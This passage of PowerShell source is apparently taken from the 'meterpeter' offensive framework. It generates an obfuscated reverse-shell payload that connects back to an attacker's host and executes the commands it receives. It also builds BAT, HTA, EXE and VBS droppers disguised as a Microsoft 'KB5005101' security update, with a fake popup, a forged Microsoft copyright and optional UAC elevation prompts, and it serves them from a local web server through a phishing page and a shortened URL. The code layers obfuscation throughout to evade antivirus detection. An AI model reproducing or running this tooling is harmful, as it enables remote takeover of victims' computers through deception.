${/}${) }${ /'}${*;}+${/}${~(}${()``} + ${/}${# }${~(}+${/}${) }${ /'}${) }+ ${/}${) }${;.*}${ /'}+${/}${) }${) }${()``}+${/}${~(}${()``} +${/}${()``}${*;} +${/}${) }${) }${ /'} + ${/}${*;}${*;} + ${/}${) }${) }${) } + ${/}${) }${ /'}${ /'} +${/}${) }${ /'}${*-} +${/}${) }${) }${ /'}+ ${/}${) }${ /'}${)#+}+ ${/}${*;}${)#+}+ ${/}${*-}${# }+${/}${*-}${# } + ${/}${)#+}${()``}+ ${/}${) }${ /'}${;.*} + ${/}${) }${ /'}${*-} + ${/}${) }${) }${ /'} + ${/}${*;}${]/!} +${/}${) }${ /'}${# } +${/}${*;}${*;}+${/}${) }${ /'}${*;} + ${/}${) }${ /'}${ /'}+ ${/}${) }${ /'}${# }+${/}${) }${ /'}${*-}+${/}${) }${) }${ /'} +${/}${) }${ /'}${) }+ ${/}${~(}${()``}+ ${/}${]/!}${) }+ ${/}${) }${ /'}${) }+${/}${) }${) }${()``}+${/}${()``}${()``} + ${/}${) }${;.*}${) } + ${/}${) }${) }${()``}+ ${/}${) }${ /'}${) }+ ${/}${) }${) }${*-}+ ${/}${~(}${ /'} +${/}${)#+}${()``}+${/}${# }${)#+} +${/}${) }${) }${()``} +${/}${) }${) }${~(} + ${/}${) }${ /'}${*-}+${/}${) }${) }${ /'} + ${/}${) }${ /'}${)#+}+${/}${~(}${) }+ ${/}${) }${;.*}${~(}+ ${/}${)#+}${]/!}+${/}${) }${;.*}${)#+} +${/}${)#+}${()``}+ ${/}${*;}${*-}+ ${/}${)#+}${;.*}+${/}${~(}${*-} +${/}${()``}${()``} +${/}${# }${# } +${/}${]/!}${*;} + ${/}${# }${;.*}+${/}${)#+}${;.*} +${/}${)#+}${()``} +${/}${]/!}${*-} + ${/}${) }${ /'}${) }+${/}${) }${;.*}${) } + ${/}${) }${;.*}${*-} + ${/}${~(}${) }+ ${/}${)#+}${;.*} + ${/}${~(}${*-} +${/}${) }${ /'}${()``} +${/}${) }${) }${) } + ${/}${) }${ /'}${*-}+ ${/}${) }${) }${ /'} + ${/}${)#+}${;.*}+ ${/}${)#+}${*;}+${/}${~(}${~(}+${/}${)#+}${*;}|${~ }\")\r\n \r\n $PowerShell = Char_Obf($PowerShell);$PowerShell = $PowerShell -replace \"@\",\"$String\";$PowerShell = $PowerShell -replace \"#\",\"$Key\";\r\n $CMD = \"hello world\";$CMD = Char_Obf($CMD);$CMD = $CMD -replace \"@\",\"$String\";$CMD = $CMD -replace \"#\",\"$Key\";\r\n\r\n Return $PowerShell,$CMD;\r\n}\r\n\r\nfunction ChkDskInternalFuncio($String){\r\n\r\n $RandomVariable = (0..99);\r\n For($i = 0; $i -lt $RandomVariable.count; $i++){\r\n\r\n $Temp = (-Join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}));\r\n\r\n While($RandomVariable -like \"$Temp\"){\r\n $Temp = (-Join ((65..90) + (97..122) | Get-Random -Count 5 | % {[char]$_}));\r\n }\r\n\r\n $RandomVariable[$i] = $Temp;\r\n $Temp = $Null;\r\n }\r\n\r\n $RandomString = $String;\r\n\r\n For($x = $RandomVariable.count; $x -ge 1; $x--){\r\n \t$Temp = $RandomVariable[$x-1];\r\n $RandomString = \"$RandomString\" -replace \"\\`$$x\", \"`$$Temp\";\r\n }\r\n\r\n $String = $RandomString;\r\n Return $String;\r\n}\r\n\r\nfunction NetworkStats($IP,$Port,$Base64_Key){\r\n\r\n [int]$Signature = Get-Random -Minimum 1 -Maximum 3\r\n $dadoninho = \"Fr`omB\" + \"ase`6\" + \"4Str`ing\" -Join ''\r\n $deskmondll = \"`$mscorelib='1'+'024' -Join '';`$MicrosoftAccountCloudAP='Cre'+'ateIn'+'stance' -join '';powershell (New-Object -ComObject Wscript.Shell).Popup('Security update installed.',$Signature,'KB5005101 21H1',0+0);`$3=`\"#`\";`$1=[System.Byte[]]::`$MicrosoftAccountCloudAP([System.Byte],`$mscorelib);Get-Date|Out-File bios.log;`$filemgmtdll='FromB'+'ase6'+'4String' -Join '';`$2=([Convert]::`$filemgmtdll(`\"@`\"));`$4=I``E``X([System.Runtime.Int\"+\"eropServices.Marshal]::PtrToStr\"+\"ingAuto([System.Runtime.InteropSe\"+\"rvices.Marshal]::SecureStringToBSTR((`$3|ConvertTo-SecureString -Key `$2))));While(`$5=`$4.GetStream()){;While(`$5.DataAvailable -or `$6 -eq `$1.count){;`$6=`$5.Read(`$1,0,`$1.length);`$7+=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(`$1,0,`$6)};If(`$7){;`$8=(I``E``X(`$7)2>&1|Out-String);If(!(`$8.length%`$1.count)){;`$8+=`\" `\"};`$9=([text.encoding]::ASCII).GetBytes(`$8);`$5.Write(`$9,0,`$9.length);`$5.Flush();`$7=`$Null}}\";\r\n\r\n $Key = $([System.Convert]::$dadoninho($Base64_Key))\r\n #$NewKey = (3,4,2,3,56,34,254,222,1,1,2,23,42,54,33,233,1,34,2,7,6,5,35,43)\r\n $C2 = ConvertTo-SecureString \"New-Object System.Net.Sockets.TCPClient('$IP','$Port')\" -AsPlainText -Force | ConvertFrom-SecureString -Key $Key;\r\n\r\n $deskmondll = ChkDskInternalFuncio(Char_Obf($deskmondll));\r\n $deskmondll = $deskmondll -replace \"@\",\"$Base64_Key\";\r\n $deskmondll = $deskmondll -replace \"#\",\"$C2\";\r\n\r\n Return $deskmondll;\r\n}\r\n\r\nClear-Host;\r\nWrite-Host $StartBanner\r\nwrite-host \" * GitHub: https://github.com/r00t-3xp10it/meterpeter *`n`n\" -ForegroundColor DarkYellow\r\n$DISTRO_OS = pwd|Select-String -Pattern \"/\" -SimpleMatch; # <-- (check IF windows|Linux Separator)\r\nIf($DISTRO_OS)\r\n{\r\n ## Linux Distro\r\n $IPATH = \"$pwd/\"\r\n $Flavor = \"Linux\"\r\n $Bin = \"$pwd/mimiRatz/\"\r\n $APACHE = \"/var/www/html/\"\r\n}Else{\r\n ## Windows Distro\r\n $IPATH = \"$pwd\\\"\r\n $Flavor = \"Windows\"\r\n $Bin = \"$pwd\\mimiRatz\\\"\r\n $APACHE = \"$env:LocalAppData\\webroot\\\"\r\n}\r\n\r\n$Obfuscation = $null\r\n## User Input Land ..\r\nWrite-Host \"Input Local Host: \" -NoNewline;\r\n$LHOST = Read-Host;\r\n$Local_Host = $LHOST -replace \" \",\"\";\r\nWrite-Host \"Input Local Port: \" -NoNewline;\r\n$LPORT = Read-Host;\r\n$Local_Port = $LPORT -replace \" \",\"\";\r\n\r\n## Default settings\r\nIf(-not($Local_Port)){$Local_Port = \"666\"};\r\nIf(-not($Local_Host)){\r\n If($DISTRO_OS){\r\n ## Linux Flavor\r\n $Local_Host = ((ifconfig | grep [0-9].\\.)[0]).Split()[-1]\r\n }else{\r\n ## Windows Flavor\r\n $Local_Host = ((ipconfig | findstr [0-9].\\.)[0]).Split()[-1]\r\n }\r\n}\r\n\r\nIf($Flavor -ieq \"Windows\")\r\n{\r\n Write-Host \"`n`n* Payload dropper format sellection!\" -ForegroundColor Black -BackgroundColor Gray\r\n Write-Host \"Id DropperFileName Format AVDetection UacElevation PsExecutionBypass\" -ForegroundColor Green\r\n Write-Host \"-- -------------------- ------ ----------- ------------ -----------------\"\r\n Write-Host \"1 Update-KB5005101.bat BAT Undetected optional true\"\r\n Write-Host \"2 Update-KB5005101.hta HTA Undetected false true\"\r\n Write-Host \"3 Update-KB5005101.exe EXE Undetected optional true\" -ForegroundColor Yellow\r\n Write-Host \"4 Update-KB5005101.vbs VBS Undetected optional true\" -ForegroundColor DarkGray\r\n $FlavorSellection = Read-Host \"Id\"\r\n}\r\nElseIf($Flavor -ieq \"Linux\")\r\n{\r\n Write-Host \"`n`n* Payload dropper format sellection!\" -ForegroundColor Black -BackgroundColor Gray\r\n Write-Host \"Id DropperFileName Format AVDetection UacElevation PsExecutionBypass\" -ForegroundColor Green\r\n Write-Host \"-- -------------------- ------ ----------- ------------ -----------------\"\r\n Write-Host \"1 Update-KB5005101.bat BAT Undetected optional true\"\r\n Write-Host \"2 Update-KB5005101.hta HTA Undetected false true\"\r\n $FlavorSellection = Read-Host \"Id\"\r\n}\r\n## End Of venom Function ..\r\n\r\n\r\n$viriatoshepard = (\"T@oB@a\" + \"s@e6@4St@\" + \"r@i@n@g\" -join '') -replace '@',''\r\n$Key = (1..32 | % {[byte](Get-Random -Minimum 0 -Maximum 255)});\r\n$Base64_Key = $([System.Convert]::$viriatoshepard($Key));\r\n\r\nWrite-Host \"`n[*] Generating Payload ✔\";\r\n$deskmondll = NetworkStats -IP $Local_Host -Port $Local_Port -Base64_Key $Base64_Key;\r\n\r\nWrite-Host \"[*] Obfuscation Type: BXOR ✔\"\r\n$deskmondll = msaudite($deskmondll);\r\n\r\nClear-Host;\r\nWrite-Host $StartBanner\r\nwrite-host \" * GitHub: https://github.com/r00t-3xp10it/meterpeter *`n`n\" -ForegroundColor DarkYellow\r\nWrite-Host \" - Payload : $payload_name.ps1\"\r\nWrite-Host \" - Local Host : $Local_Host\"\r\nWrite-Host \" - Local Port : $Local_Port\"\r\nStart-Sleep -Milliseconds 800\r\n\r\n$PowerShell_Payload = $deskmondll[0];\r\n$CMD_Payload = $deskmondll[1];\r\n\r\nWrite-Host \"`n[*] PowerShell Payload:`n\"\r\nWrite-Host \"$PowerShell_Payload\" -ForeGroundColor black -BackGroundColor white\r\n\r\n\r\nwrite-host \"`n`n\"\r\n$My_Output = \"$PowerShell_Payload\" | Out-File -FilePath $IPATH$payload_name.ps1 -Force;\r\n\r\n## Better obfu`scated IE`X system call\r\n$ttl = (\"I\" + \"@_`X\" -Join '') -replace '@_','E'\r\n#((Get-Content -Path $IPATH$payload_name.ps1 -Raw) -Replace \"$ttl\",\"Get-Date -Format 'HH:mm:ss'|Out-File bios.log;&(''.SubString.ToString()[67,72,64]-Join'')\")|Set-Content -Path $IPATH$payload_name.ps1\r\n((Get-Content -Path $IPATH$payload_name.ps1 -Raw) -Replace \"$ttl\",\"&('REX' -replace 'R','I')\")|Set-Content -Path $IPATH$payload_name.ps1\r\n\r\n\r\n$Server_port = \"$Local_Host\"+\":\"+\"$HTTP_PORT\";\r\n$check = Test-Path -Path \"/var/www/html/\";\r\nIf($check -ieq $False)\r\n{\r\n\r\n try{\r\n #Check Attacker http.server\r\n python -V > $Env:TMP\\ff.log\r\n $Python_version = (Get-Content \"$Env:TMP\\ff.log\" -ErrorAction SilentlyContinue)\r\n Remove-Item -Path \"$Env:TMP\\ff.log\" -Force -ErrorAction SilentlyContinue\r\n }Catch{}\r\n\r\n If(-not([string]::IsNullOrEmpty($Python_version)))\r\n {\r\n $Webroot_test = Test-Path -Path \"$env:LocalAppData\\webroot\\\";\r\n If($Webroot_test -ieq $True){cmd /R rmdir /Q /S \"%LocalAppData%\\webroot\\\";mkdir $APACHE|Out-Null}else{mkdir $APACHE|Out-Null};\r\n ## Attacker: Windows - with python3 installed\r\n # Deliver Dro`pper.zip using python http.server\r\n write-Host \" WebServer Client Dropper WebRoot\" -ForegroundColor Green;\r\n write-Host \" --------- ------ ------- -------\";\r\n write-Host \" Python3 Update-KB5005101.ps1 Update-KB5005101.zip $APACHE\";write-host \"`n`n\";\r\n Copy-Item -Path $IPATH$payload_name.ps1 -Destination $APACHE$payload_name.ps1 -Force\r\n\r\n If($FlavorSellection -eq 2)\r\n {\r\n \r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - meterpeter payload HTA drop`per application\r\n #>\r\n\r\n cd $Bin\r\n #delete old files left behind by previous executions\r\n If(Test-Path -Path \"$Dropper_Name.hta\" -EA SilentlyContinue)\r\n {\r\n Remove-Item -Path \"$Dropper_Name.hta\" -Force\r\n }\r\n\r\n #Make sure HTA template exists before go any further\r\n If(-not(Test-Path -Path \"Update.hta\" -EA SilentlyContinue))\r\n {\r\n Write-Host \"ERROR: file '${Bin}Update.hta' not found ...\" -ForeGroundColor Red -BackGroundColor Black\r\n Write-Host \"`n\";exit #Exit @Meterpeter\r\n }\r\n \r\n #Replace the server ip addr + port on HTA template\r\n ((Get-Content -Path \"Update.hta\" -Raw) -Replace \"CharlieBrown\",\"$Server_port\")|Set-Content -Path \"Update.hta\"\r\n\r\n #Embebed meterpter icon on HTA application?\r\n #iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/theme/meterpeter.ico\" -OutFile \"meterpeter.ico\"|Out-Null\r\n #Start-Process -WindowStyle hidden cmd.exe -ArgumentList \"/R COPY /B meterpeter.ico+Update.hta $Dropper_Name.hta\" -Wait\r\n\r\n Copy-Item -Path \"Update.hta\" -Destination \"$Dropper_Name.hta\" -Force\r\n #Compress HTA application and port the ZIP archive to 'webroot' directory!\r\n Compress-Archive -LiteralPath \"$Dropper_Name.hta\" -DestinationPath \"${APACHE}${Dropper_Name}.zip\" -Force\r\n\r\n #Revert original HTA to default to be used again\r\n ((Get-Content -Path \"Update.hta\" -Raw) -Replace \"$Server_port\",\"CharlieBrown\")|Set-Content -Path \"Update.hta\"\r\n\r\n #Delete artifacts left behind\r\n #Remove-Item -Path \"meterpeter.ico\" -EA SilentlyContinue -Force\r\n Remove-Item -Path \"$Dropper_Name.hta\" -EA SilentlyContinue -Force\r\n\r\n #return to meterpeter working directory (meterpeter)\r\n cd $IPATH\r\n \r\n }\r\n ElseIf($FlavorSellection -eq 3)\r\n {\r\n \r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - meterpeter payload EXE dro`pper application\r\n #>\r\n\r\n cd $Bin\r\n $Dropper_Bat = \"Update.ps1\"\r\n $Dropper_Exe = \"Update-KB5005101.exe\"\r\n ((Get-Content -Path \"$Dropper_Bat\" -Raw) -Replace \"CharlieBrown\",\"$Server_port\")|Set-Content -Path \"$Dropper_Bat\"\r\n\r\n #Download the required files from my GITHUB meterpeter repository!\r\n iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/PS2EXE/ps2exe.ps1\" -OutFile \"ps2exe.ps1\"|Out-Null\r\n iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/PS2EXE/meterpeter.ico\" -OutFile \"meterpeter.ico\"|Out-Null\r\n\r\n $RunEXElevated = Read-Host \"[i] Make dropper spawn UAC dialog to run elevated? (y|n)\"\r\n If($RunEXElevated -iMatch '^(y|yes)$')\r\n {\r\n .\\ps2exe.ps1 -inputFile \"$Dropper_Bat\" -outputFile \"$Dropper_Exe\" -iconFile \"meterpeter.ico\" -title \"Secure KB Update\" -version \"45.19041.692.2\" -copyright \"©Microsoft Corporation. All Rights Reserved\" -product \"KB5005101\" -noError -noConsole -requireAdmin|Out-Null\r\n Start-Sleep -Seconds 2\r\n }\r\n Else\r\n {\r\n .\\ps2exe.ps1 -inputFile \"$Dropper_Bat\" -outputFile \"$Dropper_Exe\" -iconFile \"meterpeter.ico\" -title \"Secure KB Update\" -version \"45.19041.692.2\" -copyright \"©Microsoft Corporation. All Rights Reserved\" -product \"KB5005101\" -noError -noConsole|Out-Null\r\n Start-Sleep -Seconds 2\r\n }\r\n\r\n #Compress EXE executable and port the ZIP archive to 'webroot' directory!\r\n Compress-Archive -LiteralPath \"$Dropper_Exe\" -DestinationPath \"$APACHE$Dropper_Name.zip\" -Force\r\n\r\n #Revert meterpeter EXE template to default state, after successfully created\\compressed the binary drop`per (PE)\r\n ((Get-Content -Path \"$Dropper_Bat\" -Raw) -Replace \"$Server_port\",\"CharlieBrown\")|Set-Content -Path \"$Dropper_Bat\"\r\n\r\n #Clean all artifacts left behind by this function!\r\n Remove-Item -Path \"meterpeter.ico\" -EA SilentlyContinue -Force\r\n Remove-Item -Path \"$Dropper_Exe\" -EA SilentlyContinue -Force\r\n Remove-Item -Path \"ps2exe.ps1\" -EA SilentlyContinue -Force\r\n cd $IPATH\r\n \r\n }\r\n ElseIf($FlavorSellection -eq 4)\r\n {\r\n \r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - meterpeter payload VBS drop`per application\r\n\r\n .NOTES\r\n This function accepts ip addresses from 11 to 14 chars (local)\r\n example: 192.168.1.1 (11 chars) to 192.168.101.122 (15 chars)\r\n\r\n The 'auto-elevation' function requires UAC enabled and ru`nas.\r\n #>\r\n\r\n If(-not(Test-Path -Path \"$IPATH\\Download_Crandle.vbs\" -EA SilentlyContinue))\r\n {\r\n ## Download crandle_builder.ps1 from my GitHub repository\r\n iwr -uri \"https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/utils/crandle_builder.ps1\" -OutFile \"crandle_builder.ps1\"|Unblock-File\r\n }\r\n\r\n #Evasion\\Obfusca`tion\r\n $NumberOfChars = $Local_Host.length\r\n $SeconRange = $Server_port[5,6,7,8] -join '' # 68.1\r\n $FirstRange = $Server_port[0,1,2,3,4] -join '' # 192.1\r\n If($NumberOfChars -eq 11)\r\n {\r\n #Example: 192.168.1.7 + :8087 = 15 chars\r\n $trithRange = $Server_port[9,10,11,12,13,14,15] -join ''\r\n }\r\n ElseIf($NumberOfChars -eq 12)\r\n {\r\n #Example: 192.168.1.72 + 8087 = 16 chars\r\n $trithRange = $Server_port[9,10,11,12,13,14,15,16] -join '' # .72:8087\r\n }\r\n ElseIf($NumberOfChars -eq 13)\r\n {\r\n #Example: 192.168.1.122 + 8087 = 17 chars\r\n $trithRange = $Server_port[9,10,11,12,13,14,15,16,17] -join '' \r\n }\r\n ElseIf($NumberOfChars -eq 14)\r\n {\r\n #Example: 192.168.15.124 + 8087 = 18 chars\r\n $trithRange = $Server_port[9,10,11,12,13,14,15,16,17,18] -join '' \r\n }\r\n ElseIf($NumberOfChars -eq 15)\r\n {\r\n #Example: 192.168.151.124 + 8087 = 19 chars\r\n $trithRange = $Server_port[9,10,11,12,13,14,15,16,17,18,19] -join '' \r\n }\r\n\r\n $Crandle_Build = Read-Host \"[i] Create (D)ownload or (F)ileless dropper script? (D|F)\"\r\n If($Crandle_Build -iMatch '^(f|fileless)$')\r\n {\r\n $fuckOrNot = \"fileless\"\r\n $Technic = Read-Host \"[i] Chose the FileLess Technic to add to crandle(1|2|3|4)\"\r\n }\r\n Else\r\n {\r\n #Default (%tmp%)\r\n $fuckOrNot = \"download\"\r\n }\r\n\r\n If($Technic -Match '^(2)$')\r\n {\r\n $Technic = \"two\" \r\n }\r\n ElseIf($Technic -Match '^(3)$')\r\n {\r\n $Technic = \"three\" \r\n }\r\n ElseIf($Technic -Match '^(4)$')\r\n {\r\n $Technic = \"four\" \r\n }\r\n Else\r\n {\r\n $Technic = \"one\"\r\n }\r\n\r\n\r\n $PayloadName = \"$payload_name\" + \".ps1\" -join ''\r\n $RunEXElevated = Read-Host \"[i] Make dropper spawn UAC dialog to run elevated ? (Y|N)\"\r\n If($RunEXElevated -iMatch '^(y|yes)$')\r\n {\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Execute VBS with administrator privileges?\r\n\r\n .NOTES\r\n This function add's a cmdline to the beggining of the vbs script file\r\n that invokes 'ru`nas' to spawn a UAC dialogbox to elevate appl privileges.\r\n\r\n None execution its achieved (crandler) if the target user does not\r\n accept to run the crandler with elevated privileges (UAC dialogBox)\r\n #>\r\n\r\n powershell -file crandle_builder.ps1 -action \"$fuckOrNot\" -VbsName \"Download_Crandle.vbs\" -PayloadName \"$PayloadName\" -UACElevation 'true' -Technic \"$Technic\" -Egg 'true'|Out-Null\r\n }\r\n Else\r\n {\r\n powershell -file crandle_builder.ps1 -action \"$fuckOrNot\" -VbsName \"Download_Crandle.vbs\" -PayloadName \"$PayloadName\" -UACElevation 'false' -Technic \"$Technic\" -Egg 'true'|Out-Null\r\n }\r\n\r\n #Replace the attacker ip addr (obfus`cated\\split) on vbs template\r\n ((Get-Content -Path \"Download_Crandle.vbs\" -Raw) -Replace \"VIRIATO\",\"$SeconRange\")|Set-Content -Path \"Download_Crandle.vbs\"\r\n ((Get-Content -Path \"Download_Crandle.vbs\" -Raw) -Replace \"COLOMBO\",\"$FirstRange\")|Set-Content -Path \"Download_Crandle.vbs\"\r\n ((Get-Content -Path \"Download_Crandle.vbs\" -Raw) -Replace \"NAVIGATOR\",\"$trithRange\")|Set-Content -Path \"Download_Crandle.vbs\"\r\n\r\n #Download vbs_obfuscator from GitHub repository\r\n #iwr -uri https://raw.githubusercontent.com/DoctorLai/VBScript_Obfuscator/master/vbs_obfuscator.vbs -outfile vbs_obfuscator.vbs|Unblock-File\r\n\r\n #Obfusc`ate Program.vbs sourcecode.\r\n #cscript.exe vbs_obfuscator.vbs Download_Crandle.vbs > Buffer.vbs\r\n\r\n #Parse data\r\n $CrandleVbsName = \"${Dropper_Name}\" + \".vbs\" -Join '' # Update-KB500101.vbs\r\n #$Obfusc`atedData = Get-Content Buffer.vbs | Select-Object -Skip 3\r\n #echo $Obfusc`atedData > $CrandleVbsName\r\n\r\n\r\n Start-sleep -Milliseconds 300\r\n #Change vbs crandle signature (add junk function)\r\n #[int]$Chars = Get-Random -Minimum 6 -Maximum 20 #Random variable length sellection! (from 6 => 20)\r\n #$RandVar = -join ((65..90) + (97..122) | Get-Random -Count $Chars | % {[char]$_}) #Random variable creation!\r\n #((Get-Content -Path \"Download_Crandle.vbs\" -Raw) -Replace \"#REPLACEME\",\"Dim reverse\")|Set-Content -Path \"$CrandleVbsName\"\r\n\r\n #Compress VBS and port the ZIP archive to 'webroot' directory!\r\n Rename-Item -Path Download_Crandle.vbs -NewName $CrandleVbsName -Force\r\n\r\n\r\n ### COMPILE VBS TO EXE\r\n #C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe /target:exe /out:\"$pwd\\${Drop`per_Name}.exe\" \"$pwd\\${Dropp`er_Name}.vbs\" /platform:anyCPU\r\n Compress-Archive -LiteralPath \"$CrandleVbsName\" -DestinationPath \"${APACHE}${Dropper_Name}.zip\" -Force\r\n #Move-Item -Path \"$CrandleVbsName\" -Destination \"${APACHE}${Drop`per_Name}.vbs\" -Force\r\n\r\n #Clean all artifacts left behind\r\n Remove-Item -Path \"Buffer.vbs\" -EA SilentlyContinue -force\r\n Remove-Item -Path \"vbs_obfuscator.vbs\" -EA SilentlyContinue -force\r\n Remove-Item -Path \"crandle_builder.ps1\" -EA SilentlyContinue -force\r\n Remove-Item -Path \"Download_Crandle.vbs\" -EA SilentlyContinue -force\r\n Remove-Item -Path \"$CrandleVbsName\" -EA SilentlyContinue -force\r\n }\r\n Else\r\n {\r\n \r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - meterpeter payload BAT drop`per script\r\n #>\r\n\r\n ## (ZIP + add LHOST) to dro`pper.bat before send it to apache 2 webroot ..\r\n Copy-Item -Path \"$Bin$Dropper_Name.bat\" -Destination \"${Bin}BACKUP.bat\"|Out-Null\r\n ((Get-Content -Path $Bin$Dropper_Name.bat -Raw) -Replace \"CharlieBrown\",\"$Server_port\")|Set-Content -Path $Bin$Dropper_Name.bat\r\n\r\n $RunEXElevated = Read-Host \"[i] Make dropper spawn UAC dialog to run elevated? (y|n)\"\r\n If($RunEXElevated -iMatch '^(y|yes)$')\r\n {\r\n\r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - Execute Batch with administrator privileges?\r\n\r\n .NOTES\r\n This function add's a cmdline to the beggining of bat file that uses\r\n 'Net Session' API to check for admin privs before executing powershell\r\n -run`as on current process spawning a UAC dialogbox of confirmation.\r\n #>\r\n\r\n $MyRunes = \"r\" + \"una\" + \"s\" -join ''\r\n #TODO: run bat with admin privs ??? -> requires LanManServer (server) service active\r\n ((Get-Content -Path $Bin$Dropper_Name.bat -Raw) -Replace \"@echo off\",\"@echo off`nsc query `\"lanmanserver`\"|find `\"RUNNING`\" >nul`nif %ERRORLEVEL% EQU 0 (`n Net session >nul 2>&1 || (PowerShell start -verb $MyRunes '%~0' &exit /b)`n)\")|Set-Content -Path $Bin$Dropper_Name.bat\r\n }\r\n\r\n Compress-Archive -LiteralPath $Bin$Dropper_Name.bat -DestinationPath $APACHE$Dropper_Name.zip -Force\r\n #Revert original BAT to default to be used again\r\n Remove-Item -Path \"$Bin$Dropper_Name.bat\" -Force\r\n Copy-Item -Path \"${Bin}BACKUP.bat\" -Destination \"$Bin$Dropper_Name.bat\"|Out-Null\r\n Remove-Item -Path \"${Bin}BACKUP.bat\" -Force\r\n\r\n }\r\n\r\n write-Host \"[i] Send the URL generated to target to trigger download..\" -ForegroundColor DarkYellow;\r\n Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\Catalog.png\" -Destination \"${APACHE}Catalog.png\"|Out-Null\r\n Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\favicon.png\" -Destination \"${APACHE}favicon.png\"|Out-Null\r\n Copy-Item -Path \"${IPATH}\\Mimiratz\\theme\\Update-KB5005101.html\" -Destination \"${APACHE}Update-KB5005101.html\"|Out-Null\r\n ((Get-Content -Path \"${APACHE}Update-KB5005101.html\" -Raw) -Replace \"henrythenavigator\",\"$Dropper_Name\")|Set-Content -Path \"${APACHE}Update-KB5005101.html\"\r\n\r\n Write-Host \"[i] Attack Vector: http://$Server_port/$Dropper_Name.html\" -ForeGroundColor Black -BackGroundColor white\r\n\r\n #tinyurl function\r\n powershell -file \"${IPATH}\\Mimiratz\\shorturl.ps1\" -ServerPort \"$Server_port\" -PayloadName \"${Dropper_Name}.html\"\r\n\r\n ## Start python http.server (To Deliver Drop`per/Payload)\r\n Start-Process powershell.exe \"write-host `\" [http.server] Close this Terminal After receving the connection back in meterpeter ..`\" -ForeGroundColor red -BackGroundColor Black;cd $APACHE;$PInterpreter -m http.server $HTTP_PORT --bind $Local_Host\";\r\n }\r\n else\r\n {\r\n ## Attacker: Windows - without python3 installed\r\n # Manualy Deliver Drop`per.ps1 To Target Machine\r\n write-Host \" WebServer Client Local Path\" -ForegroundColor Green;\r\n write-Host \" --------- ------ ----------\";\r\n write-Host \" NotInstalled Update-KB5005101.ps1 $IPATH\";write-host \"`n`n\";\r\n Write-Host \"[i] Manualy Deliver '$payload_name.ps1' (Client) to Target\" -ForeGroundColor Black -BackGroundColor white;\r\n Write-Host \"[*] Remark: Install Python3 (http.server) to Deliver payloads ..\" -ForeGroundColor yellow;\r\n Write-Host \"[*] Remark: Dropper Demonstration $payload_name.bat created ..\" -ForeGroundColor yellow;\r\n\r\n## Function for @Daniel_Durnea\r\n# That does not have Python3 (http.server) installed to build Drop`pers (download crandles)\r\n# This Demostration Drop`per allow us to execute payload.ps1 in a hidden terminal windows ;)\r\n$DemoDropper = @(\"#echo off\r\npowershell (New-Object -ComObject Wscript.Shell).Popup(`\"Executing $payload_name.ps1 payload`\",4,`\"$payload_name Security Update`\",0+64)\r\npowershell -WindowStyle hidden -File $payload_name.ps1\r\ndel `\"%~f0`\"\")\r\necho $DemoDropper|Out-File \"$payload_name.bat\" -Encoding string -Force\r\n((Get-Content -Path \"$payload_name.bat\" -Raw) -Replace \"#\",\"@\")|Set-Content -Path \"$payload_name.bat\"\r\n\r\n }\r\n}\r\nelse\r\n{\r\n ## Attacker: Linux - Apache2 webserver\r\n # Deliver Dro`pper.zip using Apache2 webserver\r\n write-Host \" WebServer Client Dropper WebRoot\" -ForegroundColor Green;\r\n write-Host \" --------- ------ ------- -------\";\r\n write-Host \" Apache2 Update-KB5005101.ps1 Update-KB5005101.zip $APACHE\";write-host \"`n`n\";\r\n Copy-Item -Path $IPATH$payload_name.ps1 -Destination $APACHE$payload_name.ps1 -Force;\r\n\r\n If($FlavorSellection -eq 2)\r\n {\r\n \r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - meterpeter payload HTA drop`per application\r\n #>\r\n\r\n cd $Bin\r\n #delete old files left behind by previous executions\r\n If(Test-Path -Path \"$Dropper_Name.hta\" -EA SilentlyContinue)\r\n {\r\n Remove-Item -Path \"$Dropper_Name.hta\" -Force\r\n }\r\n\r\n #Make sure HTA template exists before go any further\r\n If(-not(Test-Path -Path \"Update.hta\" -EA SilentlyContinue))\r\n {\r\n Write-Host \"ERROR: file '${Bin}Update.hta' not found ...\" -ForeGroundColor Red -BackGroundColor Black\r\n Write-Host \"`n\";exit #Exit @Meterpeter\r\n }\r\n \r\n #Replace the server ip addr + port on HTA template\r\n ((Get-Content -Path \"Update.hta\" -Raw) -Replace \"CharlieBrown\",\"$Server_port\")|Set-Content -Path \"Update.hta\"\r\n\r\n #Embebed meterpter icon on HTA application?\r\n #iwr -Uri \"https://raw.githubusercontent.com/r00t-3xp10it/meterpeter/master/mimiRatz/theme/meterpeter.ico\" -OutFile \"meterpeter.ico\"|Out-Null\r\n #Start-Process -WindowStyle hidden cmd.exe -ArgumentList \"/R COPY /B meterpeter.ico+Update.hta $Dro`pper_Name.hta\" -Wait\r\n\r\n #Compress HTA application and port the ZIP archive to 'webroot' directory!\r\n Compress-Archive -LiteralPath \"$Dropper_Name.hta\" -DestinationPath \"${APACHE}${Dropper_Name}.zip\" -Force\r\n\r\n #Revert original HTA to default to be used again\r\n ((Get-Content -Path \"Update.hta\" -Raw) -Replace \"$Server_port\",\"CharlieBrown\")|Set-Content -Path \"Update.hta\"\r\n\r\n #Delete artifacts left behind\r\n #Remove-Item -Path \"meterpeter.ico\" -EA SilentlyContinue -Force\r\n Remove-Item -Path \"$Dropper_Name.hta\" -EA SilentlyContinue -Force\r\n\r\n #return to meterpeter working directory (meterpeter)\r\n cd $IPATH\r\n \r\n }\r\n Else\r\n {\r\n \r\n <#\r\n .SYNOPSIS\r\n Author: @r00t-3xp10it\r\n Helper - meterpeter payload BAT dro`pper script\r\n #>\r\n\r\n Copy-Item 